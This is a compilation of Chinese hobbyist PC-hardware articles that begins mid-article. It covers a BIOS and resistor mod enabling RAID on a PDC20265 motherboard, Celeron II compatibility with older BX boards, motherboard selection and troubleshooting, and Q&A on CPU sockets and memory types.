    在开始改造之前，我们首先对BIOS文件中的硬盘控制部分的驱动程序进行重写。我们推荐使用功能强大的CBROM来重写BIOS文件（对于CBROM的使用，一些报刊杂志介绍的很多，我就不在此多说了。如果你还有什么疑问请到专业的BIOS站点查找有关CBROM的文章）。再导入RAID驱动之前，最好到相关主板厂商的网站上下载最新的BIOS文件，并下载RAID Controller“lite”BIOS 1.31版本(Build16)，这款主板的下载地址是:http://www.tweakhardware.com/download/a7v/Rd131b16.bin。下载完毕后再使用CBROM将RAID控制程序导入主板BIOS，在导入后用CBROM再检查一遍确保无误。图3是对华硕A7V主板改动时的图片。

    二、改造主板
    为了让PDC20265芯片能认识新的RAID BIOS，应该再对外围电路做一点小改动。将PDC20265的52脚接地。由于PDC20265芯片的针脚较密在改造时会有点麻烦，所以改造时要非常小心。为了避免失误，你也可以通过直接在主板的主硬盘插槽（Primary）上进行改动:直接在36脚和40脚之间焊接个120～250欧姆的电阻即可，电阻的功率不需太大，一般1/2到1/8瓦的都行，如图4所示。
    当然了，如果你不愿意对你的主板电路进行改动（经销商会不对其进行保修），你也可以通过对ATA-100的数据排线作改动来实现RAID功能。但是这样改动不是很稳定，我们不推荐这样做。图5就是具体的改动，因为IDE线22孔是GND,所以我们直接将100欧姆电阻插到了36孔和22孔里，从而达到同样的效果。
    经过以上的改动，现在控制芯片可以识别RAID BIOS了，并可以成功启动Windows，在启动时你可以按CTRL+F键对RAID进行一些具体设置。
    注意:在使用RAID功能之前，首次启动时我们必须先进入纯DOS模式，运行分区程序然后重新格式化新建的RAID硬盘。否则，RAID硬盘将不会获得任何速度上的提升，并且Windows将只认出硬盘总容量的一半。如果安装成功，硬件安装向导会提示找到了RAID Controller。

    三、改造驱动程序
    以上手段改造完毕后，我们就不能再使用原来的驱动程序了，我们必须改动地址让其识别到最新的RAID信息，好在这些改动并不困难! 我们只需到Promise的网站（http://support.promise.com/）下载和你的操作系统相对应的驱动程序，然后做以下改动。
    打开下载好的文件（文件名可能是“fastt??.inf”）搜索下面例子里的“4D30”把它全改为“0D30”。举个例子:打开下载来的文件后在三个主值下有“4D30”的数字，第一次出现的地方是在“[Promise]”下，如图6所示，把“4D30”全改为“0D30”即可。第二次的位置如图7，第三次的位置如图8我们都要把它改为“0D30”。
    为什么要改动它的地址呢？这是因为PDC20267的ID是4D30，而PDC20265的ID是0D30，它们各不相同。其它采用PDC20265芯片的主板的改造方法也是这样的，在这方面并无区别。
    经过我们以上三部分的改造，这时，我们只需重新启动Windows就可以尽情享用我们的劳动成果了，虽然看起有点麻烦但改造成功后的乐趣会令你的疲劳无影无踪，可能这也就是DIY的精神所在吧。
    注意:请各位在改造主板时务必慎重，本刊对任何造成的硬件损坏和数据丢失概不负责！


赛扬II和主板搭配FAQ

《一键清理系统垃圾》

赛扬II和主板搭配FAQ

     目前市面上已经有了.18微米工艺的赛扬533A在上销售了，这种赛扬处理器跟PIII(F-PGA)的推出一样，“原则上”是没有办法使用在老的主板上，其实这些问题和以前的PIII一样，可以通过一些办法来解决的，以下就是我整理的一些问题，主要是对于BX的主板搭配新赛扬的，希望可以对现在还在使用较老主板的朋友有帮助。

    C-533A资料
    频率设定 66x8=533
    Vcore=1.5V
    128K L2 Cache
    MMX/KNI 指令集
    Socket 370 脚

    问：C-533A搭配新的转卡用吗？还是旧转卡就可以了？

    需要新的转接卡，这部份就跟 P3(FC-PGA) 一样，所以须购买可支持 P3(FC-PGA) 的转接卡， 自然可支持新 Celeron。

    问：Celeron电压不是1.5V 吗？我把转接卡电压设好之后，为何无法开机？

    不开机的原因主要有二：第一， 请确定使用了新型的转接卡，第二，那就是您的主板太旧了，无法提供 1.5V 所需电压， 请直接设定电压至 1.8V，需要特别说明一下的是关于核心电压的问题，一般较老的主板，由于不支持VRM8.4电压标准，所以无法提供1.5V的核心电压，但是一般都支持1.8V的电压，和加电压超频的道理一样，适当增加一点电压是可行的，由于新赛扬采用0.18微米的工艺，所以发热比较小，不过还是要注意散热的问题，以免CPU因为过热而烧毁。不过还是要忠告大家，最好不要改变CPU的核心电压，这样会有损坏CPU的风险。

    问：我的主机板好像没提到可以支援到 x8 倍频，那还可以用吗？

    Yes,大概除了工程样版，所有正式出货的Intel CPU已被锁频，倍频已被固定。因此主板上的倍频设定一点也发挥不了作用，不用去设定它，也不用去理会它。C-533A的倍频是x8，只要注意主机板要设定多少外频即可。新的566/600一样可用。

    问：厂商很明确地说我的Abit BH6 1.0或Asus P2B 1.0这类旧板子无法使用 C-533A，那我还可以用吗？还是该换板子？

    就电压规格上来说的确不行，因为这些板子的电压只提供到1.8V，当然没有C-533A所需的1.5V(不符 VRM 8.4 电压规格)，但要用还是可用，只是要加压使用，以此来看，所有的440BX主板皆可搭配新Celeron 使用。当然厂商并不会鼓励各位这么用。呵呵。

    问：我有一个问题想请教！我有一块旧BX板，想升级为赛扬II，现在市场上有几种转接卡，价格从25－120元不等，例徽星6905，IWill的slocketII，还有没品牌的，都称支持最新的CPU，不知道我应该如何选择？

    答：如果单纯从支持与否来说，只要是支持铜矿的转接卡都可以支持新赛扬的，不过如果对于想要超频来说，当然是选用名牌的转接卡比较好，毕竟大厂出的产品，用料与做工都是杂牌的转接卡无法比的，而且很多名牌的转接卡有很多专为超频设计的功能，比如调节电压什么的，超频成功的可能性更大一些。如果你要选择一款杂牌的转接卡，一定记得要选择带有核心电压调节的转接卡。而且赛扬533A是新的超频极品，大多数都可以超到800的，呵呵。所以选择一款好的转接卡比较重要的。微星的和IWILL的转接卡都很不错的。

    问：今天刚烧毁一块赛扬533二代!使用微星6309主板,电脑报报道6309可支持新赛扬, 有谁帮帮我,应该怎样设置6309?

    答：微星的6309采用的是VIA的694芯片组，支持铜矿等新型的CPU，其电压范围最低支持1.3V。所以支持新赛扬是没有问题的，为什么会烧毁，可能是你以前使用的其他CPU,BIOS中电压没有使用主板的默认值，是设为手动的，比如因为超频的原因把电压设置为2.0V甚至更高，超过了新赛扬的电压承受范围，所以烧毁了。你应该在BIOS中把CPU的核心电压设为AUTO或者是DEFAULT。

    问：我的主板是msi6199na，买的时候包装上没有贴支持铜矿，不知道跟后出的是否一样，我的bios已刷到3.3，倍频到8，按你的说法c-II600，633都能上？我打算买一块转接卡，请你推荐一块，谢谢！！

    答：可以支持的，即使你使用的CPU超过8倍频，也可以支持的，因为CPU已经锁了倍频，它的主频只由外频来设定就可以了。只是要升级支持该类型CPU的BIOS就可以了。

    问：我的转接卡和主板BIOS都可以设定电压，要以哪一个为准呢？

    答：如果转接卡和主板BIOS都设定，那么结果将以主机板为主。如果想要以转接卡的设定为主，那麽主板所提供的电压设定须设为自动侦测(Atuo)或预设值(default）


铜矿”主板的选择和升级

《一键清理系统垃圾》

铜矿”主板的选择和升级

    随着Intel公司Pentium Ⅲ处理器在高端市场迅速取代Pentium Ⅱ系列处理器，为了更牢固地掌握低端市场Intel近期推出了Celeron Ⅱ处理器，它继承了Celeron A处理器（含有128K L2 CACHE）产品价廉物美的特点，一上市就受到玩家的青睐，由于Celeron Ⅱ处理器采用0.18微米制造工艺，所以具备很强的超频能力，使超频爱好者有了新的目标，但也就是采用了0.18微米制造，所以它的一些特性与传统PPGA赛扬处理器有所不同，导致不是所有的主流主板都支持Coppermine＆Celeron Ⅱ，以下就介绍一下能够较好地支持Coppermine和Celeron Ⅱ处理器的主板，给用户选购主板时作一个参考。
    一、主板选购要点
    一般来说目前支持Coppermine的主板都可以上Celeron Ⅱ处理器，而支持Coppermine作为一个卖点大多都在包装盒或说明书上有明确标注。
    1.BIOS与电压问题
    主板要支持Coppermine，关键问题是能否识别新款处理器和提供合乎标准的电压。一些早期购买的主板不能识别Pentium Ⅲ系列处理器，很多主板把Celeron Ⅱ识别成Pentium Ⅲ，这些问题一般通过BIOS升级都能得到解决。对于一些软跳线的主板识别处理器型号的问题更显重要，在最初的自动设置中系统是根据检测到的处理器具体型号自动设定对应的外频和电压以及相关参数，一旦这些某些设定错误，则可能导致不能正常开机。对于把Celeron Ⅱ识别成Pentium Ⅲ的主板，如果用的是软跳线的主板需要核对一下软跳线菜单中设置电压的选项是否被默认设置成1.6V，用户可以手动修改为Celeron Ⅱ所需要的1.5V电压，除了电压外其他基本不影响Celeron Ⅱ的使用。（^24030601a^）
    电压问题是主板是否支持新款处理器的核心问题，Coppermine和Celeron Ⅱ处理器需要的电压比现有常规PPGA Celeron处理器的2.0V都要低，尤其是Celeron Ⅱ标准工作电压仅为1.5V。由于VRM8.4规范发布比较晚，很多早期生产的主板都是按照VRM8.2规范制造的，所以很多主板不能提供较低的电压设定。按照VRM8.2规范制造同期制造的Socket 370主板由于CPU管脚功能对应的问题不能支持Coppermine和Celeron Ⅱ。直到Coppermine上市以后厂商才严格按照VRM8.4规范推出了新型号的主板，尤其是Socket 370主板改动了主板线路才彻底符合Coppermine和Celeron Ⅱ的供电要求。所以选购主板时注意一下主板允许设定的电压范围，其下限最好为1.3V，说不定哪天Intel又推出了电压更底的处理器版本。
    有的用户寄希望于提供电压调整的转接卡解决电压问题，虽然转接卡跳线上标注有可以设定较低的电压，但大多数情况下是否奏效还要看主板。转接卡本身不具备电压调整的物理线路，所谓电压设定不过是通过一组跳线给出一个电压设定请求，如果主板没有对应的电压设计仍然是无效的。
    2.主板PCI 4分频设计问题
    主板PCI 4分频设计主要是针对使用133MHz外频的系统，也就是说选用Coppermine “EB”系列处理器用户应当考虑这个问题。赛扬系列（包括赛扬Ⅱ）标准是采用66MHz外频，Pentium Ⅲ部分使用100MHz，而系统中PCI总线频率一直维持在33MHz，很多硬件设备如硬盘和PCI插卡都是参照标准速度设计的。早期的BX主板可以根据系统使用的外频自动选择2分频还是3分频以维持PCI总线频率合乎标准。由于早期产品没有考虑到使用133MHz外频，直到后期的BX主板才提供了4分频设计，有了4分频设计后，当处理器工作在133MHz外频下其PCI频率为外频的四分之一，仍然为33MHz。如果没有4分频设计主板，依然按照100MHz外频时所采用的3分频，此时虽然用户的处理器并未超频，不过PCI总线上的频率为133MHz的三分之一，为44.3MHz，其他的硬件如硬盘和PCI插卡都工作在超频状态，稳定性得不到保证。如果硬件质量不过硬还会导致系统不稳定甚至损坏硬件。由此，使用133MHz外频处理器的用户购买具备PCI 4分频设计的主板十分重要。
    二、各类主板的选择
    1.Intel 440BX系列主板
    BX依然是很多用户的选择对象，从大的方面看要选择标称支持Coppermine的主板，最好是新型号产品，如果是Slot 1结构还要配一块优质的转接卡。细节方面用户应注意选购主板的最好提供1.5V以下电压设定的主板以适合Coppermine和Celeron Ⅱ的供电要求，而且要有PCI 4分频设计（对于Celeron Ⅱ和不使用133MHz外频处理器的用户可以忽略）。有的主板提供最低1.8V电压，虽然大部分Coppermine和Celeron Ⅱ处理器在此电压下可以安全工作，不过毕竟是权宜之计，能够设定到更低的电压更好。
    对于使用133MHz外频的用户，BX主板并不在推荐之列，因为它的控制芯片没有正式支持133MHz外频，尽管现在很多具备PCI4分频BX主板也可以很好地工作。
    另外对于购置Socket 370主板的用户注意为了以后升级考虑，即使现在仍使用比较便宜的PPGA普通赛扬处理器，也应当购买改进型支持Coppermine和Celeron Ⅱ的产品，不然以后又面临升级主板的麻烦。
    2.Intel 810/820系列主板
    i810为整合型主板，由于很多此类主板没有提供AGP插槽，使用户不能使用性能更好的AGP显卡，所以在DIY市场并不被看好。i810主板多采用Socket 370形式，购买时请注意产品是否标明支持Coppermine的型号。
    i820主板是Coppermine的好搭档，也是正式支持133MHz外频的主板之一，但是它必须使用价格昂贵的RAMBUS。虽然性能优良，但高昂的价格依然使用户望而却步。过去有些i820主板集成有MTH芯片允许用户使用主流的PC－100 SDRAM，但由于MTH芯片有问题被回收，看来必须使用RAMBUS的i820主板离用户的距离又远了一层。
    3.VIA Apollo Pro 133（A）系列主板
    VIA Apollo Pro 133A正式支持133MHz外频，支持使用Coppermine处理器，同时还支持SDRAM非同步工作，使内存的选择余地拓宽。在一些性能指标上有一定优势，不过非Intel产品对其他硬件的兼容性问题一直受到关注，厂商也提供了一些补丁程序加以修正。虽然VIA Apollo Pro 133（A）系列主板总体性能不弱于BX主板，不过如果用户不想多加补丁，还是选用Intel控制芯片组的主板比较方便。（^24030601b^）
    三、老用户主板升级
    用户较早购买的采用Intel 440BX芯片组Solt 1结构的主板，如果可以提供1.8V以下电压（最好支持1.6V以下）的产品，很多可以通过BIOS升级和更换一块支持Coppermine的转接卡就能支持使用Coppermine和Celeron Ⅱ处理器。具体BIOS升级情况需要密切留意厂商主页的更新，一般在BIOS升级栏目中会注明新版BIOS提供的新特性，如对某某CPU的支持、修正的某某缺陷等。对于需要升级133MHz外频处理器的用户，应检查一下自己的主板是否支持PCI 4分频，这项设计在后期的BX主板中应用颇多。如果你的BX主板系统工作在133MHz外频时不稳定可以考虑内存的速度（尽管很多内存条都自称符合PC－133标准），要是你的主板不支持PCI 4分频还要考虑你电脑中其他部件如硬盘、显卡等因超频导致不稳定。如果确实如此，要不更换硬件只能降低处理器外频，但这样一来由于CPU是锁频的，必将使CPU工作在低于标称频率的速度下，对用户而言多少有点亏了。
    在电压方面，如果主板不提供低电压，可以适当提高设定电压，一般以1.8V为限，很多老主板都支持1.8V电压，处理器工作在超压状态时用户要注意CPU的温度，增强散热措施。有些主板在说明书上说最高支持8倍频，但现在的Celeron Ⅱ 566需要用到8.5倍频，一般问题也不大，照样可以正常工作，CPU的倍频数是锁定的，能够自动工作在预设的倍频数下。
    有不少中期的BX主板配合赛扬处理器推出了Socket 370插座的主板，当时使用赛扬处理器可以不用转接卡，但是现在升级到Coppermine和Celeron Ⅱ处理器就没有这么幸运，绝大部分原来设计时就不能支持Coppermine。Socket 370的主板由于在硬件上主板插座与Coppermine功能引脚不完全相同，FC－PGA 封装的处理器有两个RESET引脚，再加上原来做在主板上的Socket 370插座也不能更换，所以不能通过简单的BIOS升级达到支持新款CPU的目的。市场上支持Coppermine的新款Socket 370主板是厂商做了硬件改动的。
    四、FC－PGA转接卡的选购与使用
    市场上大部分Coppermine和赛扬Ⅱ处理器为FC－PGA封装形式，要与Slot 1结构的主板配合使用，转接卡必不可少。名牌的转接卡大多布线精细，做工用料都比较上乘，有的转接卡如IWILL Ⅱ上使用了容量较大的高品质电容，有助于提高滤除杂讯的效果。名牌产品布线上很多都有自己的独到之处，特殊的布线都是为了降低信号的畸变失真，提高处理器的稳定性。很多名牌转接卡如IWILL、升技、硕泰克等都在线路板外加了类似PentiumⅡ处理器外壳的塑料护套，充分利用Slot 1槽边的支架更牢固地固定转接卡。作为高档产品，这些转接卡有的提供了电压调整等附加功能。没有特殊要求的一般新装机用户，选用普通转接卡也能非常稳定地工作，至于高档转接卡比较适合于高要求的用户或超频爱好者，优质的转接卡配合性能出众的主板可以将处理器超频到一个更高的境界，同时也有助于为一定范围内超频工作的处理器提高稳定性


一、主板

《一键清理系统垃圾》

一、主板

[color=Maroon]1. 因为主板扩展槽或扩展卡有问题，导致插上诸如声卡等扩展卡后主板没有响应而无显示。

    2. 免跳线主板在CMOS里设置的CPU频率不对，也可能会引发不显示故障，对此，只要清除CMOS即可予以解决。清除CMOS的跳线一般在主板的锂电池附近，其默认位置一般为1、2短路，只要将其改跳为2、3短路几秒种即可解决问题，对于以前的老主板如若用户找不到该跳线，只要将电池取下，待开机显示进入CMOS设置后再关机，将电池上上去亦达到CMOS放电之目的。

    3. 主板无法识别内存、内存损坏或者内存不匹配也会导致开机无显示的故障。某些老的主板比较挑剔内存，一旦插上主板无法识别的内存，主板就无法启动，甚至某些主板不给你任何故障提示（鸣叫）。当然也有的时候为了扩充内存以提高系统性能，结果插上不同品牌、类型的内存同样会导致此类故障的出现，因此在检修时，应多加注意。

    对于主板BIOS被破坏的故障，我们可以插上ISA显卡看有无显示（如有提示，可按提示步骤操作即可。），倘若没有开机画面，你可以自己做一张自动更新BIOS的软盘，重新刷新BIOS，但有的主板BIOS被破坏后，软驱根本就不工作，此时，可尝试用热插拔法加以解决（我曾经尝试过，只要BIOS相同，在同级别的主板中都可以成功烧录。）。但采用热插拔除需要相同的BIOS外还可能会导致主板部分元件损坏，所以可靠的方法是用写码器将BIOS更新文件写入BIOS里面（可找有此服务的电脑商解决比较安全）。

常见故障二：CMOS设置不能保存
    此类故障一般是由于主板电池电压不足造成，对此予以更换即可，但有的主板电池更换后同样不能解决问题，此时有两种可能：

    1. 主板电路问题，对此要找专业人员维修；

    2. 主板CMOS跳线问题，有时候因为错误的将主板上的CMOS跳线设为清除选项，或者设置成外接电池，使得CMOS数据无法保存。

常见故障三：在Windows下安装主板驱动程序后出现死机或光驱读盘速度变慢的现象

    在一些杂牌主板上有时会出现此类现象，将主板驱动程序装完后，重新启动计算机不能以正常模式进入Windows 98桌面，而且该驱动程序在Windows 98下不能被卸载。如果出现这种情况，建议找到最新的驱动重新安装，问题一般都能够解决，如果实在不行，就只能重新安装系统。

常见故障四：安装Windows或启动Windows时鼠标不可用

    出现此类故障的软件原因一般是由于CMOS设置错误引起的。在CMOS设置的电源管理栏有一项modem use IRQ项目，他的选项分别为3、4、5......、NA，一般它的默认选项为3，将其设置为3以外的中断项即可。

常见故障五：电脑频繁死机，在进行CMOS设置时也会出现死机现象

    在CMOS里发生死机现象，一般为主板或CPU有问题，如若按下法不能解决故障，那就只有更换主板或CPU了。

    出现此类故障一般是由于主板Cache有问题或主板设计散热不良引起，笔者在815EP主板上就曾发现因主板散热不够好而导致该故障的现象。在死机后触摸CPU周围主板元件，发现其温度非常烫手。在更换大功率风扇之后，死机故障得以解决。对于Cache有问题的故障，我们可以进入CMOS设置，将Cache禁止后即可顺利解决问题，当然，Cache禁止后速度肯定会受到有影响。

常见故障六：主板COM口或并行口、IDE口失灵

    出现此类故障一般是由于用户带电插拔相关硬件造成，此时用户可以用多功能卡代替，但在代替之前必须先禁止主板上自带的COM口与并行口（有的主板连IDE口都要禁止方能正常使用）。


无法启动？主板故障浅析

《一键清理系统垃圾》

无法启动？主板故障浅析

   对电脑来说，既然电源是动力，那么主板就应该是提供动力的桥梁，如果桥梁不能通过，那做什么都是徒劳的。当你无法开机的时候，经过检查如果发现电源没有问题的话，估计问题就出主板身上了。
   怎么说呢，因为主板是各个配件的总连接处，电脑的一切配件都要经过主板来连接，如果它出现问题，导致无法启动的情况出现是不奇怪的。
   主板出现的问题情况比较多，我仅仅向大家介绍几种常见的问题：首先是开机的时候，如果电源灯不亮，显示器黑屏，其他组件什么反应都没有，这时一般人会立马想到是否电源出了问题，但事实上，主板坏了也是会出现这种状况的。
   在一台电脑里，电脑的启动需要一个启动装置，一般来讲，这个装置都在主板上，其中主要有一个启动电容，如果这个电容损坏了，就会出现什么都没反应的情况。这个电容虽然非常小，但是很容易发现：拿起主板，仔细观察，你会发现一个铁质的电解电容，它通常被一个金属丝环绕住。有了这么明显的特征，应该可以轻易找到了。
   解决办法就是将一个好的电容更换上去。这种问题算是比较常见的,我有两个朋友就是因为这个问题而启动不了机子，一个因为已经过了保修期，无奈只好拿到电脑城修理，也就是换了那个电容。另一个哥们还好，反正包换期还没过，干脆找商家换了块新主板回来，毕竟，问题虽小，解决起来还是比较麻烦的。
   还有就是主板的接口问题。因为主板上要接很多的配件，如果某个接口坏了，那么就表示这个配件不能用了，这样也会启动不了，例如：主板的AGP槽有问题，那可能就没法启动了。其实这问题严格的说不能归结到无法启动，有可能已经启动了，但是无法显示出来，所以最后我还是把它归到这方面来了。
   我现在用的电脑就有这样的问题，AGP槽很松，显卡的金手指不能和槽内的接触点接触，这样就没办法显示，要重新插过几次后，找准方位才行。还有是IDE接口有问题，这样根本不能检测到硬盘，那更不用说进入系统了。
   另外，还有内存槽的问题，如果你开机的时候，主机内的喇叭发出“嘀，嘀”的声音，而且其他组件没任何反映，这就有可能是内存槽不行了（当然也可能是内存坏了，但现在我们暂时先不考虑内存的问题）。还有其他的接口，像CPU接口等，在这里我就不一一赘述啦。
   主板上最重要的是芯片。一般的非整合主板都有两个芯片，一个是南桥芯片，一个是北桥芯片。从传统意义上讲，北桥最主要的任务就是作为CPU与系统交换的主界面，以其中的内存控制器功能最为重要。除此以外，北桥还负责与南桥进行沟通。
   而南桥的功能则五花八门的，可以包括磁盘控制器、音频合成、以太网络控制器以及我们经常接触也是必有的I/O界面（例如串口、PS/2口等）。如果北桥芯片坏了，那么CPU与系统的主界面交换就会出现问题，然后CPU在电脑上就不起作用了。既然中央处理器都不能用，那能不能启动是可想而知的，而且同时内存的控制功能也失去了，电脑没了两大部件的支持，哪里还有显示啊？
   南桥芯片一旦出现问题，电脑也就失去了磁盘控制器功能，这和没有了硬盘是没什么两样的。可见这两个芯片有多重要！这两个芯片如果烧掉了，那可是个致命伤，在电脑城是没办法修的，除非送回原厂去修。我宿舍众多电脑中，就有一块主板出现过这样的问题，南桥的芯片烧掉了，保修期也已经过了，只好再买一块。如果是整合主板就更惨，因为它只有一个芯片，要是坏了可比一般的主板的问题还要严重。所以在装机或使用的时候，一定要注意这些细节问题，以免造成无须有的损失。
   主板的问题导致启动失败原因各不相同，而且每块主板的结构也不一定相同，所以出现的问题也不同，这里不可能把所有的情况都叙述出来，我仅仅是把自己的经历和经验写出来与大家共同切磋一下，如果有所错漏还是希望大家能给出建议，我也能从中学习到知识。


硬件基础知识

《一键清理系统垃圾》

硬件基础知识

Ⅰ题目：CPU插槽类型分为SocketA Socket370 Socket478 Socket603 Socket604 Socket754 Socket775 Socket939 Socket940
        这些类型都代表什么意思???
答：Socket478是Intel P4系列的接口
    Socket603 Socket604是Intel的Xeon（至强）处理器的接口，603、604分别对应400M、533MFSB
    Socket754是AMD“低端”的Athlon64系列处理器的接口
    Socket775，这个称呼其实是错误的，应该是LGA775，是Intel为了搭配最新的Prescott核心推出的
    Socket939是AMD高端的Athlon64 FX系列处理器的接口
    Socket940是AMD服务器级的Opteron（皓龙）处理器的接口
答：CPU插槽类型是针对不同的处理器的.
    SocketA处理器绝唱：Sempron 2800+
    Socket370 是P3\Tualtin赛
    Socket478 Pentium IV和Celeron IV
    Socket603 Intel 奔腾4 XEON 较老,2.0 FSB 400MHz
    Socket604 Intel 奔腾4 XEON 较新如Intel 奔腾4 XEON3.0GHz FSB 533MHz
    Socket754 闪龙3100＋开始采用Socket754接口，采用Paris核心
    Socket-775 Pentium4 Extreme Edition 3.4 GHz
    Socket939 AMDK8处理器,我估计此规格将成为AMD今后一段时间的统一标准.
    Socket940 AMD服务器平台的Opteron.
ＰＳ:AMD:A,754,939,940
     Intel:370,478,603,604,775
     A的就是462主要是ATHLON XP/DURON/SEMPRON（462）
     754主要是ATHLON 64（1M单通，512K单通）
     939主要是ATHLON 64（512K双通）部分新ATHLON 64 FX
     940主要是ATHLON 64 FX老版本和OPTERON
     370主要是COPPERMINE/TULATIN核心的PENTIUM 3
     478主要是NORTHWOOD/部分PRESSCOTT核心的PENTIUM 4/PENTIUM 4 XE/CELERON 4/CELERON D
     775主要是新版的PRESSCOTT核心的PENTIUM 4/CELERON D还有部分PENTIUM 4 XE
Ⅱ题目：主板内存插槽类型
        RDRAM
        ECC SDRAM
        ECC DDR SDRAM
        SDRAM
        DDR SDRAM
        DDR2
        这些都代表什么意思?
答：RDRAM 早期搭配Intel 850芯片组和423接口P4的双通道内存，当时价格昂贵，用来搭配Intel平台最高端的产品，因为423接口P4的失败而鲜为人知
    ECC SDRAM 带ECC校验的SD内存，一般为服务器使用，插口和普通SDRAM一致
    ECC DDR SDRAM 带ECC校验的DDR内存
    SDRAM 俗称普通内存（为了区别DDR内存），接口上为两个缺口
    DDR SDRAM DDR内存，与SDRAM的区别是一个始终周期内传输两次信号，接口为一个缺口，目前的主流
    DDR2 DDR二代，工作效率较DDR内存没有明显提升，价格昂贵，用来搭配最新的Intel 775接口平台和AMD 64位最高端平台
答：都是内存类型。
    RDRAM最早见与丽台的S800显卡，使用了8M的RDRAM最显存。后来台式电脑使用是从i820 chipset开始的，intel为了解决内存带宽的问题，为P3设计了i820芯片组，但是当时RDRAM过于昂贵，而且为普及速度很慢，后来intel为i820设计了可以使用SDRAM的转接芯片，但是出现了BUG，不得不回收，所以i820就被后来只支持SDRAM的815取代了。RDRAM采用串型协议，可以达到很高的频率来获得很高的性能。
    ECC SDRAM是带奇偶效验的内存，多用于服务器等对数据完整性要求比较高的场合，接口和普通的SDRAM一样，只不过多了一个ECC芯片。
    ECC DDR，就是DDR类型的内存采用了ECC容错技术的产物，和普通的DDR内存接口一样。
    SDRAM，就是同步动态存储器（SynchronousDRAM），从技术角度上讲，同步动态存储器是在标准动态存储器中加入同步控制逻辑(一个状态机)，利用一个单一的系统时钟同步所有的地址数据和控制信号。所以性能比老的EDO等内存强的多。在i430时代开始进入桌面市场，在440LX/BX时代达到高潮。
    DDR SDRAM，就是双倍速率的SDRAM（Dual Date Rate SDRSM），它在时钟速度不变的情况下，可以在时钟的上升和下降沿传输数据，等于速度提高了一倍。
    DDR2，可以在一个时钟周期内传输4次数据，所以它可以在较低的频率下达到较高的性能，比如同样是等效400M，SDRAM就要运行在400M的频率下，而DDR只要运行在200M的速度下，而DD2更少，只要100M就可以了。但是DDR2的延迟时间要比DDR高。
    以上内存的接口不同，而且电压也不相同。除了RDRAM是串型外，其它类型的内存全是并行的。
答：内存所采用的内存类型，不同类型的内存传输类型各有差异，在传输率、工作频率、工作方式、工作电压等方面都有不同。目前市场中主要有的内存类型有SDRAM、DDR SDRAM和RDRAM三种，其中DDR SDRAM内存占据了市场的主流，而SDRAM内存规格已不再发展，处于被淘汰的行列。RDRAM则始终未成为市场的主流，只有部分芯片组支持，而这些芯片组也逐渐退出了市场，RDRAM前景并不被看好。
    SDRAM：SDRAM，即Synchronous DRAM（同步动态随机存储器），曾经是PC电脑上最为广泛应用的一种内存类型，即便在今天SDRAM仍旧还在市场占有一席之地。既然是“同步动态随机存储器”，那就代表着它的工作速度是与系统总线速度同步的。SDRAM内存又分为PC66、PC100、PC133等不同规格，而规格后面的数字就代表着该内存最大所能正常工作系统总线速度，比如PC100，那就说明此内存可以在系统总线为100MHz的电脑中同步工作。

    与系统总线速度同步，也就是与系统时钟同步，这样就避免了不必要的等待周期，减少数据存储时间。同步还使存储控制器知道在哪一个时钟脉冲期由数据请求使用，因此数据可在脉冲上升期便开始传输。SDRAM采用3.3伏工作电压，168Pin的DIMM接口，带宽为64位。SDRAM不仅应用在内存上，在显存上也较为常见。
    DDR SDRAM：严格的说DDR应该叫DDR SDRAM，人们习惯称为DDR，部分初学者也常看到DDR SDRAM，就认为是SDRAM。DDR SDRAM是Double Data Rate SDRAM的缩写，是双倍速率同步动态随机存储器的意思。DDR内存是在SDRAM内存基础上发展而来的，仍然沿用SDRAM生产体系，因此对于内存厂商而言，只需对制造普通SDRAM的设备稍加改进，即可实现DDR内存的生产，可有效的降低成本。
    SDRAM在一个时钟周期内只传输一次数据，它是在时钟的上升期进行数据传输；而DDR内存则是一个时钟周期内传输两次次数据，它能够在时钟的上升期和下降期各传输一次数据，因此称为双倍速率同步动态随机存储器。DDR内存可以在与SDRAM相同的总线频率下达到更高的数据传输率。
    与SDRAM相比：DDR运用了更先进的同步电路，使指定地址、数据的输送和输出主要步骤既独立执行，又保持与CPU完全同步；DDR使用了DLL(Delay Locked Loop，延时锁定回路提供一个数据滤波信号)技术，当数据有效时，存储控制器可使用这个数据滤波信号来精确定位数据，每16次输出一次，并重新同步来自不同存储器模块的数据。DDL本质上不需要提高时钟频率就能加倍提高SDRAM的速度，它允许在时钟脉冲的上升沿和下降沿读出数据，因而其速度是标准SDRA的两倍。
    从外形体积上DDR与SDRAM相比差别并不大，他们具有同样的尺寸和同样的针脚距离。但DDR为184针脚，比SDRAM多出了16个针脚，主要包含了新的控制、时钟、电源和接地等信号。DDR内存采用的是支持2.5V电压的SSTL2标准，而不是SDRAM使用的3.3V电压的LVTTL标准。
    RDRAM：RDRAM（Rambus DRAM）是美国的RAMBUS公司开发的一种内存。与DDR和SDRAM不同，它采用了串行的数据传输模式。在推出时，因为其彻底改变了内存的传输模式，无法保证与原有的制造工艺相兼容，而且内存厂商要生产RDRAM还必须要加纳一定专利费用，再加上其本身制造成本，就导致了RDRAM从一问世就高昂的价格让普通用户无法接收。而同时期的DDR则能以较低的价格，不错的性能，逐渐成为主流，虽然RDRAM曾受到英特尔公司的大力支持，但始终没有成为主流。
    RDRAM的数据存储位宽是16位，远低于DDR和SDRAM的64位。但在频率方面则远远高于二者，可以达到400MHz乃至更高。同样也是在一个时钟周期内传输两次次数据，能够在时钟的上升期和下降期各传输一次数据，内存带宽能达到1.6Gbyte/s。
    普通的DRAM行缓冲器的信息在写回存储器后便不再保留，而RDRAM则具有继续保持这一信息的特性，于是在进行存储器访问时，如行缓冲器中已经有目标数据，则可利用，因而实现了高速访问。另外其可把数据集中起来以分组的形式传送，所以只要最初用24个时钟，以后便可每1时钟读出1个字节。一次访问所能读出的数据长度可以达到256字节
    ECC是Error Checking and Correcting（错误检查和纠正）的简写。它广泛应用于各种领域的计算机指令中。而本文主要讲解ECC在计算机内存中的应用。ECC和奇偶校验（Parity）类似。然而，在那些Parity只能检测到错误的地方，ECC实际上可以纠正绝大多数错误。经过内存的纠错，计算机的操作指令才可以继续执行。
    DDR 也就是“双倍数据传输”（double datarate）的缩写，这几年来一直是PC内存的主流标准。目前DDR已达到400MHz，DDR2将以533MHz起跳，并在年底前达到667MHz.更高的时脉将可达到更高的数据传输，提高PC性能。同时DDR2也会更省电。DDR2的总线宽度与DDR 64 bit的宽度完全相同，但前者由于运行在双通道模式，因此能够提供高达128 bits的总线宽度。在目前来说，DDR2和DDR3都已经开始被使用在某些对内存带宽需求较高的高端显示卡中。目前我们在市场上见到的DDR2，却并非我们将要看到量产的DDR2，因此目前PC-4300和PC2-4300的性能，未来将会有极大的改观，要知道内存控制器正在进行重大的改进。
